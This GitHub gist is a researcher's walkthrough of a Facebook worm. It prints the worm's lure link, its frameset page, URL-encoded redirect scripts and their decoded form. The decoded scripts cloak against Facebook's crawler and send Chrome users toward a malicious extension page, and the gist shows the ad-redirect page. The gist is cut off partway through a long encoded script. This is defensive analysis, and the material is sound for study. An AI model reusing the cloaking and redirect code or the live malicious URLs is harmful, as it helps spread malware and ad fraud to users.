Skip to content

Instantly share code, notes, and snippets.

@phwd

phwd/wormwormworm.txt

Last active April 18, 2023 13:36
Show Gist options
  • Save phwd/0ec21c6289543f35135e17aa11f7dec1 to your computer and use it in GitHub Desktop.
Save phwd/0ec21c6289543f35135e17aa11f7dec1 to your computer and use it in GitHub Desktop.
Download ZIP
Digging into a Facebook Worm
Raw
wormwormworm.txt
Digging into a Facebook Worm
http://i.imgur.com/zc2A8vJ.png
Facebook worms are interesting
The following was a link that was shared to me (You probably shouldn't click it)
https://www.facebook.com/l.php?u=https%3A%2F%2Fcdn.fbsbx.com%2Fhphotos-xpa1%2Fv%2Ft59.2708-21%2F12447002_1746605272238633_1642381431_n.html%2FV1DE0-9682.html%3Foh%3D8a665fb34c8793a92fd02cceb31d4b01%26oe%3D5718116B%26dl%3D1&h=cAQHPcYE7
What's interesting here is the creator of this bug has figured a way to upload HTML to Facebook servers using a technique similar (or not?) to what Jack and Myself found
https://cdn.fbsbx.com/hphotos-xpa1/v/t59.2708-21/12447002_1746605272238633_1642381431_n.html/V1DE0-9682.html?oh=8a665fb34c8793a92fd02cceb31d4b01&oe=5718116B&dl=1
So, join me on this adventure and let's how deep this goes!
First step is download the file V1DE0-9682.html seems that 9682 is random.
<head>
<meta property="og:locale" content="en_US"/>
<meta property="og:type" content="website"/>
<meta property="og:title" content="fotodoto.azurewebsites.net"/>
<meta property="og:description" content="fotodoto.azurewebsites.net"/>
<meta property="og:url" content="fotodoto.azurewebsites.net"/>
<meta property="og:site_name" content="fotodoto.azurewebsites.net"/>
<meta property="og:image" content="fotodoto.azurewebsites.net" />
</head>
<frameset rows="100%">
<frame src="https://s3-eu-west-1.amazonaws.com/video47543/red.html">
<noframes>
<body></body>
</noframes>
</frameset>
So this is a frame to a site with file called red.html seems familiar...
http://thenextweb.com/insider/2012/12/19/criminals-use-facebook-and-tumblr-to-push-chrome-extensions-that-can-access-all-your-website-data/
Nah, couldn't be, did they really come back for round 2?
Downloading https://s3-eu-west-1.amazonaws.com/video47543/red.html
<Script Language='Javascript'>
<!-- HTML Encryption provided by iWEBTOOL.com -->
<!--
document.write(unescape('%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%20%2F%2F%20%3C%21%5B%43%44%41%54%41%5B%0A%69%66%20%28%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%41%6E%64%72%6F%69%64%27%29%20%21%3D%20%2D%31%29%20%29%20%7B%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%3A%2F%2F%73%33%2E%61%6D%61%7A%6F%6E%61%77%73%2E%63%6F%6D%2F%76%69%34%33%38%35%38%39%34%2F%73%2E%68%74%6D%6C%22%3B%0A%7D%20%2F%2F%20%5D%5D%3E%0A%3C%2F%73%63%72%69%70%74%3E%20%20%20%20%20%0A%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%6A%61%76%61%73%63%72%69%70%74%3E%0A%69%66%28%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%69%50%68%6F%6E%65%2F%69%29%29%20%7C%7C%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%69%50%6F%64%2F%69%29%29%29%0A%7B%0A%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%2F%73%33%2E%61%6D%61%7A%6F%6E%61%77%73%2E%63%6F%6D%2F%76%69%34%33%38%35%38%39%34%2F%73%2E%68%74%6D%6C%22%29%3B%0A%7D%0A%3C%2F%73%63%72%69%70%74%3E%0A%20%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%3E%0A%0A%0A%69%66%20%28%6E%61%76%69%67%61%74%6F%72%5B%27%75%73%65%72%41%67%65%6E%74%27%5D%5B%27%69%6E%64%65%78%4F%66%27%5D%28%27%46%69%72%65%66%6F%78%27%29%20%21%3D%20%2D%31%29%20%7B%0A%20%20%20%20%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%20%3D%20%27%68%74%74%70%73%3A%2F%2F%73%33%2E%61%6D%61%7A%6F%6E%61%77%73%2E%63%6F%6D%2F%76%69%34%33%38%35%38%39%34%2F%69%6E%64%65%78%2E%68%74%6D%6C%27%3B%0A%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%69%66%20%28%6E%61%76%69%67%61%74%6F%72%5B%27%75%73%65%72%41%67%65%6E%74%27%5D%5B%27%69%6E%64%65%78%4F%66%27%5D%28%27%46%61%63%65%62%6F%6F%6B%20%42%6F%74%27%29%20%21%3D%20%2D%31%29%20%7B%0A%20%20%20%20%20%20%20%20%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%20%3D%20%27%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%27%3B%0A%20%20%20%20%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%6E%61%76%69%67%61%74%6F%72%5B%27%75%73%65%72%41%67%65%6E%74%27%5D%5B%27%69%6E%64%65%78%4F%66%27%5D%28%27%43%68%72%6F%6D%65%27%29%20%21%3D%20%2D%31%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%20%3D%20%27%68%74%74%70%73%3A%2F%2F%73%33%2E%61%6D%61%7A%6F%6E%61%77%73%2E%63%6F%6D%2F%76%69%34%33%38%35%38%39%34%2F%69%6E%64%65%78%2E%68%74%6D%6C%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%65%6C%73%65%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%77%69%6E%64%6F%77%5B%27%6C%6F%63%61%74%69%6F%6E%27%5D%20%3D%20%27%68%74%74%70%3A%2F%2F%73%33%2E%61%6D%61%7A%6F%6E%61%77%73%2E%63%6F%6D%2F%76%69%34%33%38%35%38%39%34%2F%73%2E%68%74%6D%6C%27%3B%0A%20%20%20%20%20%20%20%20%7D%3B%0A%20%20%20%20%7D%3B%0A%7D%3B%0A%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%62%6F%64%79%3E'));
//-->
</Script>
Oh yeah I'm definitely having déjà vu. Decoding this URL encoded block gives us
<script type="text/javascript"> // <![CDATA[
if ( (navigator.userAgent.indexOf('Android') != -1) ) {
document.location = "http://s3.amazonaws.com/vi4385894/s.html";
} // ]]>
</script>
<script language=javascript>
if((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i)))
{
location.replace("http://s3.amazonaws.com/vi4385894/s.html");
}
</script>
<body>
<script>
if (navigator['userAgent']['indexOf']('Firefox') != -1) {
window['location'] = 'https://s3.amazonaws.com/vi4385894/index.html';
} else {
if (navigator['userAgent']['indexOf']('Facebook Bot') != -1) {
window['location'] = 'http://google.com/';
} else {
if (navigator['userAgent']['indexOf']('Chrome') != -1) {
window['location'] = 'https://s3.amazonaws.com/vi4385894/index.html';
} else {
window['location'] = 'http://s3.amazonaws.com/vi4385894/s.html';
};
};
};
</script>
</body>
This seems to just check for a specific User agent, Google Chrome. For all other devices, the user is directed to
Which is just a bunch of ads
<script type="text/javascript">
// http://mobile.bitterstrawberry.org/?id=5221 http://t0pm0b1l3.com/?id=5221 http://mobile.dollarlink.net/r/faif?aaid=341&aff_id=1380 //http://tracking.redirect.pub/ad/89f59368?d=1
new Image().src="http://whos.amung.us/widget/adeamobi.png"; //http://global.dollarking.org/mobiledirect/?aaid=341 http://mobile.dollars4ads.com/directclick/?&odata=YWlkPTMxNzc0JnVpZD0xMzg4 //http://mobile.bitterstrawberry.org/?id=5221
</script>
<meta http-equiv="refresh" content="0;URL=http://mobile.bitterstrawberry.org/?id=5221">
So why target Google Chrome, is this really the same guys from before are they really coming back with another Chrome plugin. What happens when the user navigates with Chrome?
Redirected to https://s3.amazonaws.com/vi4385894/index.html
This is where more fun happens
<Script Language='Javascript'>
<!-- HTML Encryption provided by iWEBTOOL.com -->
<!--
document.write(unescape('%0A%3C%68%74%6D%6C%20%78%6D%6C%6E%73%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%31%39%39%39%2F%78%68%74%6D%6C%22%20%70%72%65%66%69%78%3D%22%6F%67%3A%20%68%74%74%70%3A%2F%2F%6F%67%70%2E%6D%65%2F%6E%73%23%22%20%78%6D%6C%6E%73%3A%66%62%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%32%30%30%38%2F%66%62%6D%6C%22%20%78%6D%6C%6E%73%3A%6F%67%3D%22%68%74%74%70%3A%2F%2F%6F%70%65%6E%67%72%61%70%68%70%72%6F%74%6F%63%6F%6C%2E%6F%72%67%2F%73%63%68%65%6D%61%2F%22%3E%0A%3C%68%74%6D%6C%20%78%6D%6C%6E%73%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%77%33%2E%6F%72%67%2F%31%39%39%39%2F%78%68%74%6D%6C%22%3E%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%75%74%66%2D%38%22%20%2F%3E%0A%0A%0A%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%63%68%72%6F%6D%65%2D%77%65%62%73%74%6F%72%65%2D%69%74%65%6D%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%63%68%72%6F%6D%65%2E%67%6F%6F%67%6C%65%2E%63%6F%6D%2F%77%65%62%73%74%6F%72%65%2F%64%65%74%61%69%6C%2F%63%6B%6F%64%6E%6E%6F%6B%65%6E%6E%6F%62%6B%6F%6A%6F%63%6F%6D%6E%67%65%61%6D%62%6F%64%6B%66%6F%6B%22%3E%0A%3C%6C%69%6E%6B%20%72%65%6C%3D%22%73%68%6F%72%74%63%75%74%20%69%63%6F%6E%22%20%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%73%2E%79%74%69%6D%67%2E%63%6F%6D%2F%79%74%73%2F%69%6D%67%2F%66%61%76%69%63%6F%6E%2D%76%66%6C%64%4C%7A%4A%78%79%2E%69%63%6F%22%20%74%79%70%65%3D%22%69%6D%61%67%65%2F%78%2D%69%63%6F%6E%22%3E%0A%0A%3C%74%69%74%6C%65%3E%4E%65%77%20%56%69%64%65%6F%3C%2F%74%69%74%6C%65%3E%0A%0A%3C%73%63%72%69%70%74%3E%6E%65%77%20%49%6D%61%67%65%28%29%2E%73%72%63%20%3D%20%27%2F%2F%77%68%6F%73%2E%61%6D%75%6E%67%2E%75%73%2F%77%69%64%67%65%74%2F%61%64%65%61%70%63%70%63%2E%70%6E%67%27%3B%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%61%6A%61%78%2E%67%6F%6F%67%6C%65%61%70%69%73%2E%63%6F%6D%2F%61%6A%61%78%2F%6C%69%62%73%2F%6A%71%75%65%72%79%2F%31%2E%37%2E%32%2F%6A%71%75%65%72%79%2E%6D%69%6E%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%69%66%28%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%69%50%68%6F%6E%65%2F%69%29%29%20%7C%7C%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%6D%61%74%63%68%28%2F%69%50%6F%64%2F%69%29%29%29%0A%7B%0A%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%73%3A%2F%2F%73%33%2D%65%75%2D%77%65%73%74%2D%31%2E%61%6D%61%7A%6F%6E%61%77%73%2E%63%6F%6D%2F%76%69%64%65%6F%34%37%35%34%33%2F%73%2E%68%74%6D%6C%22%29%3B%0A%7D%0A%0A%0A%69%66%20%28%20%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%69%6E%64%65%78%4F%66%28%27%41%6E%64%72%6F%69%64%27%29%20%21%3D%20%2D%31%29%20%29%20%7B%0A%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%22%68%74%74%70%73%3A%2F%2F%73%33%2D%65%75%2D%77%65%73%74%2D%31%2E%61%6D%61%7A%6F%6E%61%77%73%2E%63%6F%6D%2F%76%69%64%65%6F%34%37%35%34%33%2F%73%2E%68%74%6D%6C%22%3B%0A%7D%0A%0A%0A%2F%2A%21%66%75%6E%63%74%69%6F%6E%28%61%29%7B%76%61%72%20%62%3D%2F%69%50%68%6F%6E%65%2F%69%2C%63%3D%2F%69%50%6F%64%2F%69%2C%64%3D%2F%69%50%61%64%2F%69%2C%65%3D%2F%28%3F%3D%2E%2A%5C%62%41%6E%64%72%6F%69%64%5C%62%29%28%3F%3D%2E%2A%5C%62%4D%6F%62%69%6C%65%5C%62%29%2F%69%2C%66%3D%2F%41%6E%64%72%6F%69%64%2F%69%2C%67%3D%2F%49%45%4D%6F%62%69%6C%65%2F%69%2C%68%3D%2F%28%3F%3D%2E%2A%5C%62%57%69%6E%64%6F%77%73%5C%62%29%28%3F%3D%2E%2A%5C%62%54%6F%75%63%68%5C%62%29%2F%69%2C%69%3D%2F%42%6C%61%63%6B%42%65%72%72%79%2F%69%2C%6A%3D%2F%4F%70%65%72%61%20%4D%69%6E%69%2F%69%2C%6B%3D%2F%28%3F%3D%2E%2A%5C%62%46%69%72%65%66%6F%78%5C%62%29%28%3F%3D%2E%2A%5C%62%4D%6F%62%69%6C%65%5C%62%29%2F%69%2C%6C%3D%6E%65%77%20%52%65%67%45%78%70%28%22%28%3F%3A%4E%65%78%75%73%20%37%7C%42%4E%54%56%32%35%30%7C%4B%69%6E%64%6C%65%20%46%69%72%65%7C%53%69%6C%6B%7C%47%54%2D%50%31%30%30%30%29%22%2C%22%69%22%29%2C%6D%3D%66%75%6E%63%74%69%6F%6E%28%61%2C%62%29%7B%72%65%74%75%72%6E%20%61%2E%74%65%73%74%28%62%29%7D%2C%6E%3D%66%75%6E%63%74%69%6F%6E%28%61%29%7B%76%61%72%20%6E%3D%61%7C%7C%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%3B%74%68%69%73%2E%61%70%70%6C%65%3D%7B%70%68%6F%6E%65%3A%6D%28%62%2C%6E%29%2C%69%70%6F%64%3A%6D%28%63%2C%6E%29%2C%74%61%62%6C%65%74%3A%6D%28%64%2C%6E%29%2C%64%65%76%69%63%65%3A%6D%28%62%2C%6E%29%7C%7C%6D%28%63%2C%6E%29%7C%7C%6D%28%64%2C%6E%29%7D%2C%74%68%69%73%2E%61%6E%64%72%6F%69%64%3D%7B%70%68%6F%6E%65%3A%6D%28%65%2C%6E%29%2C%74%61%62%6C%65%74%3A%21%6D%28%65%2C%6E%29%26%26%6D%28%66%2C%6E%29%2C%64%65%76%69%63%65%3A%6D%28%65%2C%6E%29%7C%7C%6D%28%66%2C%6E%29%7D%2C%74%68%69%73%2E%77%69%6E%64%6F%77%73%3D%7B%70%68%6F%6E%65%3A%6D%28%67%2C%6E%29%2C%74%61%62%6C%65%74%3A%6D%28%68%2C%6E%29%2C%64%65%76%69%63%65%3A%6D%28%67%2C%6E%29%7C%7C%6D%28%68%2C%6E%29%7D%2C%74%68%69%73%2E%6F%74%68%65%72%3D%7B%62%6C%61%63%6B%62%65%72%72%79%3A%6D%28%69%2C%6E%29%2C%6F%70%65%72%61%3A%6D%28%6A%2C%6E%29%2C%66%69%72%65%66%6F%78%3A%6D%28%6B%2C%6E%29%2C%64%65%76%69%63%65%3A%6D%28%69%2C%6E%29%7C%7C%6D%28%6A%2C%6E%29%7C%7C%6D%28%6B%2C%6E%29%7D%2C%74%68%69%73%2E%73%65%76%65%6E%5F%69%6E%63%68%3D%6D%28%6C%2C%6E%29%2C%74%68%69%73%2E%61%6E%79%3D%74%68%69%73%2E%61%70%70%6C%65%2E%64%65%76%69%63%65%7C%7C%74%68%69%73%2E%61%6E%64%72%6F%69%64%2E%64%65%76%69%63%65%7C%7C%74%68%69%73%2E%77%69%6E%64%6F%77%73%2E%64%65%76%69%63%65%7C%7C%74%68%69%73%2E%6F%74%68%65%72%2E%64%65%76%69%63%65%7C%7C%74%68%69%73%2E%73%65%76%65%6E%5F%69%6E%63%68%2C%74%68%69%73%2E%70%68%6F%6E%65%3D%74%68%69%73%2E%61%70%70%6C%65%2E%70%68%6F%6E%65%7C%7C%74%68%69%73%2E%61%6E%64%72%6F%69%64%2E%70%68%6F%6E%65%7C%7C%74%68%69%73%2E%77%69%6E%64%6F%77%73%2E%70%68%6F%6E%65%2C%74%68%69%73%2E%74%61%62%6C%65%74%3D%74%68%69%73%2E%61%70%70%6C%65%2E%74%61%62%6C%65%74%7C%7C%74%68%69%73%2E%61%6E%64%72%6F%69%64%2E%74%61%62%6C%65%74%7C%7C%74%68%69%73%2E%77%69%6E%64%6F%77%73%2E%74%61%62%6C%65%74%7D%2C%6F%3D%6E%65%77%20%6E%3B%6F%2E%43%6C%61%73%73%3D%6E%2C%22%75%6E%64%65%66%69%6E%65%64%22%21%3D%74%79%70%65%6F%66%20%6D%6F%64%75%6C%65%26%26%6D%6F%64%75%6C%65%2E%65%78%70%6F%72%74%73%3F%6D%6F%64%75%6C%65%2E%65%78%70%6F%72%74%73%3D%6F%3A%22%66%75%6E%63%74%69%6F%6E%22%3D%3D%74%79%70%65%6F%66%20%64%65%66%69%6E%65%26%26%64%65%66%69%6E%65%2E%61%6D%64%26%26%64%65%66%69%6E%65%28%6F%29%2C%61%2E%69%73%4D%6F%62%69%6C%65%3D%6F%7D%28%74%68%69%73%29%3B%0A%69%66%20%28%69%73%4D%6F%62%69%6C%65%2E%61%6E%79%20%7C%7C%20%6E%61%76%69%67%61%74%6F%72%2E%70%6C%61%74%66%6F%72%6D%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%20%3D%3D%20%2D%31%29%20%7B%0A%0A%74%6F%70%2E%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%3D%22%68%74%74%70%73%3A%2F%2F%73%33%2D%65%75%2D%77%65%73%74%2D%31%2E%61%6D%61%7A%6F%6E%61%77%73%2E%63%6F%6D%2F%76%69%64%65%6F%34%37%35%34%33%2F%73%2E%68%74%6D%6C%22%3B%0A%7D%2A%2F%3C%2F%73%63%72%69%70%74%3E%0A%20%20%3C%73%63%72%69%70%74%3E%0A%0A%09%09%69%66%20%28%74%6F%70%2E%6C%6F%63%61%74%69%6F%6E%20%21%3D%20%73%65%6C%66%2E%6C%6F%63%61%74%69%6F%6E%29%20%7B%20%74%6F%70%2E%6C%6F%63%61%74%69%6F%6E%20%3D%20%73%65%6C%66%2E%6C%6F%63%61%74%69%6F%6E%20%7D%0A%69%66%20%28%73%65%6C%66%20%21%3D%20%74%6F%70%29%20%7B%0A%20%20%20%74%6F%70%2E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%6C%6F%63%61%74%69%6F%6E%2E%68%72%65%66%29%3B%0A%7D%0A%09%09%20%3C%2F%73%63%72%69%70%74%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%74%79%6C%65%3E%0A%2F%2A%2A%2A%2A%2A%2A%2A%20%42%4F%44%59%20%2A%2A%2A%2A%2A%2A%2A%2A%2F%0A%62%6F%64%79%20%7B%0A%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%33%70%78%3B%0A%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%41%72%69%61%6C%2C%20%48%65%6C%76%65%74%69%63%61%2C%20%73%61%6E%73%2D%73%65%72%69%66%3B%0A%62%61%63%6B%67%72%6F%75%6E%64%3A%23%66%31%66%31%66%31%3B%0A%6D%61%72%67%69%6E%3A%30%70%78%3B%0A%70%61%64%64%69%6E%67%3A%30%70%78%3B%0A%7D%0A%0A%2F%2A%2A%2A%2A%2A%2A%2A%20%48%45%41%44%45%52%20%2A%2A%2A%2A%2A%2A%2A%2A%2F%0A%23%68%65%61%64%65%72%20%7B%0A%70%6F%73%69%74%69%6F%6E%3A%20%66%69%78%65%64%3B%0A%74%6F%70%3A%30%70%78%3B%0A%6C%65%66%74%3A%30%70%78%3B%0A%72%69%67%68%74%3A%30%70%78%3B%0A%68%65%69%67%68%74%3A%20%35%30%70%78%3B%0A%77%69%64%74%68%3A%20%31%30%30%25%3B%0A%62%61%63%6B%67%72%6F%75%6E%64%3A%20%23%66%66%66%20%75%72%6C%28%27%68%74%74%70%3A%2F%2F%69%2E%69%6D%67%75%72%2E%63%6F%6D%2F%35%66%4C%73%49%4D%61%2E%70%6E%67%27%29%20%6C%65%66%74%20%63%65%6E%74%65%72%20%6E%6F%2D%72%65%70%65%61%74%3B%0A%62%6F%72%64%65%72%2D%62%6F%74%74%6F%6D%3A%20%31%70%78%20%73%6F%6C%69%64%20%23%65%38%65%38%65%38%3B%0A%63%75%72%73%6F%72%3A%20%70%6F%69%6E%74%65%72%3B%0A%7A%2D%69%6E%64%65%78%3A%20%31%39%39%39%39%39%39%39%39%39%3B%0A%7D%0A%0A%2F%2A%2A%2A%2A%2A%2A%2A%20%4D%41%49%4E%20%2A%2A%2A%2A%2A%2A%2A%2A%2F%0A%23%6D%61%69%6E%20%7B%0A%77%69%64%74%68%3A%37%30%32%70%78%3B%0A%68%65%69%67%68%74%3A%35%31%30%70%78%3B%0A%62%6F%72%64%65%72%3A%30%70%78%20%73%6F%6C%69%64%20%23%63%63%63%3B%0A%6D%61%72%67%69%6E%3A%30%70%78%20%61%75%74%6F%3B%0A%6D%61%72%67%69%6E%2D%74%6F%70%3A%32%30%70%78%3B%0A%70%61%64%64%69%6E%67%3A%30%70%78%20%30%70%78%20%30%70%78%20%30%70%78%3B%0A%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%0A%7D%0A%0A%68%31%20%7B%0A%6D%61%72%67%69%6E%3A%37%30%70%78%20%30%70%78%20%31%30%70%78%20%30%70%78%3B%0A%70%61%64%64%69%6E%67%3A%30%70%78%3B%0A%63%6F%6C%6F%72%3A%23%33%33%33%3B%0A%66%6F%6E%74%2D%73%69%7A%65%3A%20%32%30%70%78%3B%0A%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%62%6F%6C%64%3B%0A%6C%69%6E%65%2D%68%65%69%67%68%74%3A%20%31%2E%33%38%3B%0A%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%0A%74%65%78%74%2D%61%6C%69%67%6E%3A%63%65%6E%74%65%72%3B%0A%7D%0A%0A%2F%2A%2A%2A%2A%2A%2A%2A%20%43%4F%4E%54%45%4E%49%44%4F%20%2A%2A%2A%2A%2A%2A%2A%2A%2F%0A%23%63%6F%6E%74%65%6E%69%64%6F%20%7B%0A%66%6C%6F%61%74%3A%6C%65%66%74%3B%0A%77%69%64%74%68%3A%37%30%30%70%78%3B%0A%6D%61%72%67%69%6E%3A%30%70%78%3B%0A%70%61%64%64%69%6E%67%3A%30%70%78%20%30%70%78%20%31%31%30%70%78%20%30%70%78%3B%20%0A%62%61%63%6B%67%72%6F%75%6E%64%3A%20%23%66%66%66%20%75%72%6C%28%27%68%74%74%70%3A%2F%2F%69%2E%69%6D%67%75%72%2E%63%6F%6D%2F%75%66%6B%70%59%79%66%2E%70%6E%67%27%29%20%62%6F%74%74%6F%6D%20%63%65%6E%74%65%72%20%6E%6F%2D%72%65%70%65%61%74%3B%0A%62%6F%72%64%65%72%3A%20%31%70%78%20%73%6F%6C%69%64%3B%0A%62%6F%72%64%65%72%2D%63%6F%6C%6F%72%3A%20%23%65%35%65%36%65%39%20%23%64%66%65%30%65%34%20%23%64%30%64%31%64%35%3B%0A%2D%77%65%62%6B%69%74%2D%62%6F%72%64%65%72%2D%72%61%64%69%75%73%3A%20%35%70%78%3B%0A%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%0A%7D%0A%0A%23%74%69%74%75%6C%6F%20%7B%0A%77%69%64%74%68%3A%38%30%30%70%78%3B%0A%6D%61%72%67%69%6E%3A%31%30%70%78%20%30%70%78%20%31%30%70%78%20%30%70%78%3B%0A%70%61%64%64%69%6E%67%3A%30%70%78%3B%0A%63%6F%6C%6F%72%3A%23%33%33%33%3B%0A%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%35%70%78%3B%0A%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%6E%6F%72%6D%61%6C%3B%0A%6C%69%6E%65%2D%68%65%69%67%68%74%3A%20%31%2E%33%38%3B%0A%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%0A%7D%0A%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%7B%0A%09%70%6F%73%69%74%69%6F%6E%3A%72%65%6C%61%74%69%76%65%3B%0A%09%6D%61%72%67%69%6E%2D%62%6F%74%74%6F%6D%3A%30%70%78%3B%0A%09%63%75%72%73%6F%72%3A%70%6F%69%6E%74%65%72%3B%0A%09%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%2E%69%6D%61%67%65%20%7B%0A%09%77%69%64%74%68%3A%31%30%30%25%3B%0A%09%68%65%69%67%68%74%3A%31%30%30%25%3B%0A%09%62%61%63%6B%67%72%6F%75%6E%64%2D%73%69%7A%65%3A%31%30%30%25%20%31%30%30%25%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%2E%70%6C%61%79%2D%62%75%74%74%6F%6E%20%7B%0A%09%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%0A%09%74%6F%70%3A%35%30%25%3B%0A%09%6C%65%66%74%3A%35%30%25%3B%0A%09%6D%61%72%67%69%6E%2D%6C%65%66%74%3A%2D%33%34%70%78%3B%0A%09%6D%61%72%67%69%6E%2D%74%6F%70%3A%2D%32%33%70%78%3B%0A%09%64%69%73%70%6C%61%79%3A%62%6C%6F%63%6B%3B%0A%09%77%69%64%74%68%3A%36%35%70%78%3B%0A%09%68%65%69%67%68%74%3A%34%37%70%78%3B%0A%09%62%61%63%6B%67%72%6F%75%6E%64%3A%20%75%72%6C%28%27%68%74%74%70%3A%2F%2F%69%2E%69%6D%67%75%72%2E%63%6F%6D%2F%33%6C%45%71%35%69%66%2E%70%6E%67%27%29%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%3A%68%6F%76%65%72%20%2E%70%6C%61%79%2D%62%75%74%74%6F%6E%20%7B%0A%09%62%61%63%6B%67%72%6F%75%6E%64%2D%70%6F%73%69%74%69%6F%6E%3A%2D%36%35%70%78%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%2E%6F%76%65%72%6C%61%79%20%7B%0A%09%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%0A%09%62%61%63%6B%67%72%6F%75%6E%64%3A%20%23%30%30%30%3B%0A%09%6F%70%61%63%69%74%79%3A%20%2E%35%3B%0A%09%77%69%64%74%68%3A%31%30%30%25%3B%0A%09%68%65%69%67%68%74%3A%31%30%30%25%3B%0A%09%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%0A%09%6C%65%66%74%3A%30%3B%74%6F%70%3A%30%3B%0A%7D%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%20%2E%73%68%61%72%65%62%6F%78%20%7B%0A%09%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%0A%09%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%0A%09%6C%65%66%74%3A%31%30%70%78%3B%0A%09%74%6F%70%3A%37%30%70%78%3B%0A%09%72%69%67%68%74%3A%31%30%70%78%3B%0A%09%68%65%69%67%68%74%3A%31%33%31%70%78%3B%0A%09%70%61%64%64%69%6E%67%3A%30%70%78%3B%0A%09%62%61%63%6B%67%72%6F%75%6E%64%3A%20%75%72%6C%28%27%63%6F%6D%70%61%72%74%69%72%2E%70%6E%67%27%29%20%63%65%6E%74%65%72%20%63%65%6E%74%65%72%20%6E%6F%2D%72%65%70%65%61%74%3B%0A%7D%0A%0A%2E%79%6F%75%74%75%62%65%62%6C%6F%63%6B%65%72%2D%6F%72%69%20%2E%73%68%61%72%65%62%6F%78%2D%6F%72%69%20%7B%0A%09%64%69%73%70%6C%61%79%3A%6E%6F%6E%65%3B%0A%09%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%0A%09%6C%65%66%74%3A%31%30%70%78%3B%0A%09%74%6F%70%3A%35%30%70%78%3B%0A%09%72%69%67%68%74%3A%31%30%70%78%3B%0A%09%68%65%69%